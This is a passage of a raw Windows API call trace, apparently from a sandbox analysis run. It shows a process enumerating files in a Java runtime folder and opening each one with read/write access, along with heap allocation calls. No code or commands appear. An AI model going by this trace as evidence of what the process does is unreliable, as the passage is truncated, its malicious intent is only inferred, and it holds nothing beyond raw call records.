(HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0094.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 53 [0094.011] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.011] GetFileType (hFile=0x360) returned 0x1 [0094.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0094.011] CloseHandle (hObject=0x360) returned 1 [0094.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.012] AreFileApisANSI () returned 1 [0094.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0094.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 53 [0094.012] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.013] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="unpack.dll", cAlternateFileName="")) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0094.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0094.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.013] AreFileApisANSI () returned 1 [0094.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll", lpUsedDefaultChar=0x0) returned 50 [0094.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.014] AreFileApisANSI () returned 1 [0094.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0094.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46a58 [0094.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 50 [0094.014] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.152] GetFileType (hFile=0x360) returned 0x1 [0094.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0094.152] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.152] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.152] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.152] CloseHandle (hObject=0x360) returned 1 [0094.153] AreFileApisANSI () returned 1 [0094.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0094.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 50 [0094.153] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.153] GetFileType (hFile=0x360) returned 0x1 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0094.153] CloseHandle (hObject=0x360) returned 1 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.154] AreFileApisANSI () returned 1 [0094.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x460b8 [0094.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll") returned 50 [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13840)) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.154] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x30240, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="unpack200.exe", cAlternateFileName="UNPACK~1.EXE")) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0094.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0094.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.155] AreFileApisANSI () returned 1 [0094.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe", lpUsedDefaultChar=0x0) returned 53 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0094.156] AreFileApisANSI () returned 1 [0094.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0094.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 53 [0094.156] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.157] GetFileType (hFile=0x360) returned 0x1 [0094.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0094.157] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.157] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 